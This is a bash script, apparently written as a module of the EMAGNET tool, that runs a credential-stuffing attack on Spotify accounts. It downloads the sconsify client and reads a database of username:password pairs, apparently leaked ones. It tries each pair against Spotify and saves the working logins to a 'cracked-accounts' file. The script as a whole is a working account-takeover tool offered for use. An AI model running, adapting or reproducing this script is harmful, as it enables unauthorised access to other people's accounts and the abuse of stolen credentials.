#!/bin/bash
################################################################################
################################################################################
####                                                                       #####
#### A notice to all nerds.                                                #####
#### If you will copy developers real work it will not make you a hacker.  #####
#### Resepect all developers, we doing this because it's fun!              #####
####                                                                       #####
################################################################################
################################ SOURCE CODE ###################################
################################################################################
####  Copyright (C) 2018-2019, wuseman                                     #####
####                                                                       #####
####  This program is free software; you can redistribute it and/or modify #####
####  it under the terms of the GNU General Public License as published by #####
####  the Free Software Foundation; either version 2 of the License, or    #####
####  (at your option) any later version.                                  #####
####                                                                       #####
####  This program is distributed in the hope that it will be useful,      #####
####  but WITHOUT ANY WARRANTY; without even the implied warranty of       #####
####  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the        #####
####  GNU General Public License for more details.                         #####
####                                                                       #####
####  You must obey the GNU General Public License. If you will modify     #####
####  wspotify file(s), you may extend this exception to your version      #####
####  of the file(s), but you are not obligated to do so.  If you do not   #####
####  wish to do so, delete this exception statement from your version.    #####
####  If you delete this exception statement from all source files in the  #####
####  program, then also delete it here.                                   #####
####                                                                       #####
####  Contact:                                                             #####
####          IRC: Freenode @ wuseman                                      #####
####          Mail: wuseman <wuseman@nr1.nu>                               #####
####                                                                       #####
################################################################################



# This script is meant for EMAGNET, released it as a stand-alone script
# if anyone just want the spotify bruter or continue with this script

# BANNER
banner() {
cat << "EOF"
      ___
     |   |
    _|___|_
     (* *)
    __)#(__
   ( )...( )(_)             Author: wuseman
   || |_| ||//              Version: 1.0
>==() | | ()/
    _(___)_
   [-]   [-]
=====================================================

EOF
}

# COLORZ
R="\e[1;31m"
G="\e[1;32m"
E="\e[0m"




find /usr/include -type d |grep 'libspotify' &> /dev/null
 if [[ "$?" -ne "0" ]]; then
   if [[ -z "$LIBSPOTIFY" ]]; then
     printf "Libspotify is deprecated but is required for $basename$0 bruteforcing\nto work, do you have libspotify installed? (YES/no): "
     read LIBSPOTIFY
        if ! [[ "$LIBSPOTIFY" = "YES" ]]; then
           echo "Can't continue until libspotify has been installed.."
           echo "Exiting.."
            exit 1
        fi
   fi
 fi

find /usr/include -name "portaudio.h" |xargs grep -v "port" &> /dev/null
   if [[ $? -ne 0 ]]; then 
       echo -e "$basename$0: internal error -- portaudio is requrired to be installed"
       exit 1
    fi



find /usr/include -type d |grep 'libspotify' &> /dev/null
  if [[ "$?" -ne "0" ]]; then
  if [[ -z "$LIBSPOTIFY" ]]; then
   printf "Libspotify is deprecated but is required for emagnet bruteforcing\nto work, do you have libspotify installed? (YES/no): "
   read LIBSPOTIFY
  if ! [[ "$LIBSPOTIFY" = "YES" ]]; then
   echo "Can't continue until libspotify has been installed.."
   echo "Exiting.."
   exit 1
  fi
  fi
  fi


    ./sconsify -version &> /dev/null
     if [[ "$?" -ne "0" ]]; then
      echo "Sconsify is required to be installed before we attacking targets.."
      read -p "Download and install sconsify (y/N): " installsconsify
         if [[ "$installsconsify" -eq "y" ]]; then
           echo -e "Hold on, downloading sconsify.."
           wget -q --user-agent="${USERAGENT}" "https://github.com/fabiofalci/sconsify/releases/download/next-20180428/linux-x86_64-sconsify-0.6.0-next.zip"
           echo -e "Unzipping sconsify into current dir.."
           unzip -q -o "linux-x86_64-sconsify-0.6.0-next.zip"
           chmod +x ./sconsify
           echo -e "Cleaning up."
           rm "linux-x86_64-sconsify-0.6.0-next.zip"
           echo "All done.."
           sleep 2
         else
           echo -e "$basename$0: internal error -- sconsify is required to be installed.."
           exit 1
         fi
  fi

if [[ ! -d "/root/cracked-accounts" ]]; then
   mkdir -p "/root/cracked-accounts"
fi

if [[ ! -f ${1} ]]; then
   echo -e "$basename$0: internal error -- No such database could be found, exiting..."
   exit 1
fi


if [[ -z ${1} ]]; then
   echo -e "\nYou must choose at least one database ... "
   echo -e "\n       Usage: ./$basename$0: database.txt\n"
   exit 1
fi


while read line; do
 SPOTIFY_USER="$(echo $line|cut -d: -f1)"
 SPOTIFY_PASS="$(echo $line|cut -d: -f2)"
./sconsify -username="${SPOTIFY_USER}" <<< "${SPOTIFY_PASS}" | grep -i -q "bad"
     if [[ "$?" -eq "0" ]]; then
         echo -e "[\e[1;31m<<\e[0m] - Wrong Password: ${SPOTIFY_USER}:${SPOTIFY_PASS}"
      else
         echo -e "[\e[1;32m>>\e[0m] - Cracked Password: ${SPOTIFY_USER}:${SPOTIFY_PASS}" 
         echo -e "${SPOTIFY_USER}:${SPOTIFY_PASS}" >> $HOME/cracked-accounts/spotify-accounts.txt
      fi
done < $1
